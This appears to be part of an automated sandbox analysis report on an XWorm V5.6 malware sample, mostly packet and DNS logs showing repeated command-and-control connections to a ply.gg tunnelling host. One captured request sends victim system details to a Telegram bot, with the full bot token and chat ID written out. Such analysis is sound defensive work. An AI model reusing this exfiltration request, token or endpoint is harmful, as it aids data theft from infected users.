                                                                                                                                        Nov 17, 2024 19:25:47.666845083 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:50.422017097 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:50.423572063 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.693392992 CET4998061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.693979979 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.698498964 CET6158649980147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:52.698884010 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:52.699465990 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.716463089 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.721440077 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:52.723473072 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:52.728842020 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:57.894483089 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:57.899842978 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:57.925570965 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:57.930525064 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:57.941236019 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:57.946202040 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:57.956886053 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:57.961869001 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:25:57.972579956 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:25:57.978137016 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:00.863215923 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:00.869419098 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:01.183012962 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:01.183075905 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.003467083 CET4998161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.005579948 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.008445024 CET6158649981147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:03.011014938 CET6158649982147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:03.011136055 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.028002024 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.032952070 CET6158649982147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:03.222429991 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:03.227632999 CET6158649982147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:09.081814051 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:09.088787079 CET6158649982147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:09.394423962 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:09.400077105 CET6158649982147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:11.501461029 CET6158649982147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:11.501566887 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:14.457381010 CET4998261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:14.461499929 CET4998361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:14.462677002 CET6158649982147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:14.466670990 CET6158649983147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:14.468439102 CET4998361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:14.485507965 CET4998361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:14.490541935 CET6158649983147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:18.675616026 CET4998361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:18.682838917 CET6158649983147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:22.972145081 CET6158649983147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:22.972223043 CET4998361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:25.160516024 CET4998361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:25.163356066 CET4998461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:25.165885925 CET6158649983147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:25.168365002 CET6158649984147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:25.171425104 CET4998461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:25.221343994 CET4998461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:25.226366997 CET6158649984147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:29.897914886 CET4998461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:29.903305054 CET6158649984147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:33.668730974 CET6158649984147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:33.669528961 CET4998461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:35.504498959 CET4998461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:35.507498026 CET4998561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:35.509926081 CET6158649984147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:35.512538910 CET6158649985147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:35.512641907 CET4998561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:35.531337023 CET4998561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:35.536298990 CET6158649985147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:43.994957924 CET6158649985147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:43.995146990 CET4998561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:45.691327095 CET4998561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:45.693893909 CET4998661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:45.697367907 CET6158649985147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:45.699311018 CET6158649986147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:45.699796915 CET4998661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:45.719329119 CET4998661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:45.724267960 CET6158649986147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:49.943352938 CET4998661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:49.950108051 CET6158649986147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:50.879209995 CET4998661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:50.884409904 CET6158649986147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:50.925916910 CET4998661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:50.930896997 CET6158649986147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:50.941371918 CET4998661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:50.946304083 CET6158649986147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:50.972846985 CET4998661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:50.977835894 CET6158649986147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:53.238382101 CET4998661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:53.244322062 CET6158649986147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:54.184866905 CET6158649986147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:54.184948921 CET4998661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:55.988153934 CET4998661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:55.991681099 CET4998761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:55.993252993 CET6158649986147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:55.997407913 CET6158649987147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:26:55.997637033 CET4998761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:56.015316963 CET4998761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:26:56.020203114 CET6158649987147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:00.081926107 CET4998761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:00.087033987 CET6158649987147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:01.191329002 CET4998761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:01.196515083 CET6158649987147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:04.493695021 CET6158649987147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:04.493792057 CET4998761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:06.253679037 CET4998761586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:06.256052017 CET4998861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:06.258737087 CET6158649987147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:06.261065960 CET6158649988147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:06.261152983 CET4998861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:06.277728081 CET4998861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:06.282682896 CET6158649988147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:06.347490072 CET4998861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:06.352658987 CET6158649988147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:06.504199982 CET4998861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:06.509242058 CET6158649988147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:06.535557985 CET4998861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:06.540838003 CET6158649988147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:10.644483089 CET4998861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:10.649655104 CET6158649988147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:11.753876925 CET4998861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:11.759654045 CET6158649988147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:14.738635063 CET6158649988147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:14.738719940 CET4998861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:16.850372076 CET4998861586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:16.854638100 CET4998961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:16.855375051 CET6158649988147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:16.859647036 CET6158649989147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:16.859735966 CET4998961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:16.902107000 CET4998961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:16.907118082 CET6158649989147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:16.956916094 CET4998961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:16.961877108 CET6158649989147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:17.066260099 CET4998961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:17.071589947 CET6158649989147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:17.129776001 CET4998961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:17.134784937 CET6158649989147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:22.160655975 CET4998961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:22.165684938 CET6158649989147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:25.342875004 CET6158649989147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:25.344082117 CET4998961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:27.144278049 CET4998961586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:27.147528887 CET4999061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:27.510487080 CET6158649989147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:27.510533094 CET6158649990147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:27.510696888 CET4999061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:27.527327061 CET4999061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:27.532361031 CET6158649990147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:29.816386938 CET4999061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:29.821526051 CET6158649990147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:30.191481113 CET4999061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:30.196518898 CET6158649990147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:32.972631931 CET4999061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:32.978090048 CET6158649990147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:32.988122940 CET4999061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:32.993185043 CET6158649990147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:35.994290113 CET6158649990147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:35.994534016 CET4999061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:38.021132946 CET4999061586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:38.021135092 CET4999161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:38.027564049 CET6158649990147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:38.027606964 CET6158649991147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:38.027775049 CET4999161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:38.046092987 CET4999161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:38.051145077 CET6158649991147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:38.238339901 CET4999161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:38.243592978 CET6158649991147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:38.253804922 CET4999161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:38.258697033 CET6158649991147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:38.316361904 CET4999161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:38.321625948 CET6158649991147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:38.347666979 CET4999161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:38.352607965 CET6158649991147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:44.738265038 CET4999161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:44.907263041 CET6158649991147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:46.538875103 CET6158649991147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:46.538938999 CET4999161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:48.425652981 CET4999161586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:48.429920912 CET4999261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:48.430910110 CET6158649991147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:48.434993029 CET6158649992147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:48.435117006 CET4999261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:48.457093954 CET4999261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:48.462407112 CET6158649992147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:48.503933907 CET4999261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:48.509042025 CET6158649992147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:48.566422939 CET4999261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:48.571434975 CET6158649992147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:48.597650051 CET4999261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:48.602582932 CET6158649992147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:48.613241911 CET4999261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:48.621745110 CET6158649992147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:56.930031061 CET6158649992147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:56.930103064 CET4999261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:58.800913095 CET4999261586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:58.803888083 CET4999361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:58.806431055 CET6158649992147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:58.808993101 CET6158649993147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:58.809070110 CET4999361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:58.838407040 CET4999361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:58.843343019 CET6158649993147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:27:58.863399029 CET4999361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:27:58.868367910 CET6158649993147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:01.411273956 CET4999361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:01.416874886 CET6158649993147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:07.303040981 CET6158649993147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:07.306000948 CET4999361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:09.363279104 CET4999361586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:09.365223885 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:09.435931921 CET6158649993147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:09.435985088 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:09.439353943 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:09.455524921 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:09.460539103 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:09.739279032 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:09.744585991 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:11.473169088 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:11.478343010 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:17.918649912 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:17.918735027 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:19.988346100 CET4999461586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:19.989413023 CET4999561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:19.994014978 CET6158649994147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:19.994613886 CET6158649995147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:19.994997978 CET4999561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:20.010523081 CET4999561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:20.015774965 CET6158649995147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:28.490392923 CET6158649995147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:28.490487099 CET4999561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:36.067286015 CET4999561586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:36.067703962 CET4999661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:36.072477102 CET6158649995147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:36.072675943 CET6158649996147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:36.072832108 CET4999661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:36.089715958 CET4999661586192.168.2.7147.185.221.23
                                                                                                                                        Nov 17, 2024 19:28:36.094845057 CET6158649996147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:44.555584908 CET6158649996147.185.221.23192.168.2.7
                                                                                                                                        Nov 17, 2024 19:28:44.559386969 CET4999661586192.168.2.7147.185.221.23

                                                                                                                                        UDP Packets

                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                        Nov 17, 2024 19:24:10.705328941 CET5018753192.168.2.71.1.1.1
                                                                                                                                        Nov 17, 2024 19:24:10.712631941 CET53501871.1.1.1192.168.2.7
                                                                                                                                        Nov 17, 2024 19:24:11.967971087 CET5464653192.168.2.71.1.1.1
                                                                                                                                        Nov 17, 2024 19:24:12.085794926 CET6200953192.168.2.71.1.1.1
                                                                                                                                        Nov 17, 2024 19:24:12.117975950 CET53620091.1.1.1192.168.2.7

                                                                                                                                        DNS Queries

                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                        Nov 17, 2024 19:24:10.705328941 CET192.168.2.71.1.1.10x1007Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                        Nov 17, 2024 19:24:11.967971087 CET192.168.2.71.1.1.10xc5e0Standard query (0)time.windows.comA (IP address)IN (0x0001)false
                                                                                                                                        Nov 17, 2024 19:24:12.085794926 CET192.168.2.71.1.1.10xc284Standard query (0)perfect-invest.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                                                                                        DNS Answers

                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                        Nov 17, 2024 19:24:10.712631941 CET1.1.1.1192.168.2.70x1007No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                        Nov 17, 2024 19:24:11.975219011 CET1.1.1.1192.168.2.70xc5e0No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                        Nov 17, 2024 19:24:12.117975950 CET1.1.1.1192.168.2.70xc284No error (0)perfect-invest.gl.at.ply.gg147.185.221.23A (IP address)IN (0x0001)false

                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                        • api.telegram.org

                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        0192.168.2.749699149.154.167.2204436312C:\Users\user\Desktop\yF21ypxRB7.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-11-17 18:24:11 UTC449OUTGET /bot7602273147:AAGPHHPgO8DxUDOWK0ZCgtSD_Rua_8wVzrE/sendMessage?chat_id=6589427579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A95B5CEC98776D486C10E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20CO53M%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
                                                                                                                                        Host: api.telegram.org
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        2024-11-17 18:24:11 UTC388INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                        Date: Sun, 17 Nov 2024 18:24:11 GMT
                                                                                                                                        Content-Type: application/json
                                                                                                                                        Content-Length: 450
                                                                                                                                        Connection: close
                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                        2024-11-17 18:24:11 UTC450INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 30 32 32 37 33 31 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 72 65 64 74 69 67 65 72 5f 73 65 72 76 65 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 65 64 74 69 67 65 72 73 65 72 76 65 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 35 38 39 34 32 37 35 37 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 21 20 4c 6f 78 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6c 6f 78 79 64 65 76 30 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 31 38 36 37 38 35 31 2c 22 74 65 78 74 22 3a 22 5c 75 32 36
                                                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":80,"from":{"id":7602273147,"is_bot":true,"first_name":"redtiger_server","username":"redtigerserver_bot"},"chat":{"id":6589427579,"first_name":"! Loxy","username":"loxydev0","type":"private"},"date":1731867851,"text":"\u26


                                                                                                                                        Statistics

                                                                                                                                        CPU Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        Memory Usage

                                                                                                                                        Click to jump to process

                                                                                                                                        High Level Behavior Distribution

                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                        Behavior

                                                                                                                                        Click to jump to process

                                                                                                                                        System Behavior

                                                                                                                                        General

                                                                                                                                        Target ID:0
                                                                                                                                        Start time:13:24:04
                                                                                                                                        Start date:17/11/2024
                                                                                                                                        Path:C:\Users\user\Desktop\yF21ypxRB7.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Users\user\Desktop\yF21ypxRB7.exe"
                                                                                                                                        Imagebase:0x470000
                                                                                                                                        File size:39'936 bytes
                                                                                                                                        MD5 hash:640194B0D51307F362B74FD4A4A1761D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
